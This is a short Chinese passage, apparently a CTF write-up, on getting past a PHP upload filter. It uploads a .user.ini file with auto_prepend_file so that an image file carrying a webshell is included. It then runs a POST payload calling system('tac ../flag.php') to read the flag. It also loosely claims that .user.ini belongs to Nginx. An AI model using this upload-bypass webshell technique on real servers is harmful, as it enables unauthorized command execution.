这⼀次再传php就拦截下来了,这⾥开始可以⽤ .user.ini 来构造后⻔
php.ini是php的⼀个全局配置⽂件,对整个web服务起作⽤;⽽.user.ini和.htaccess⼀样是⽬录的配置⽂件,.user.ini就是⽤户⾃定义的⼀个php.ini,我们可以利⽤这个⽂件来构造后⻔和隐藏后⻔。.htaccess是Apache的,.user.ini是Nginx的
auto_prepend_file=filename //包含在⽂件头
auto_append_file=filename //包含在⽂件尾
这⾥传⼀个.user.ini
⾥⾯内容写auto_prepend_file=mm.png (先上传图片然后BP改)
然后上传⼀个png图⽚,包含⽊⻢
然后利⽤⽂件包含getshell
POST:mm=system('tac ../flag.php');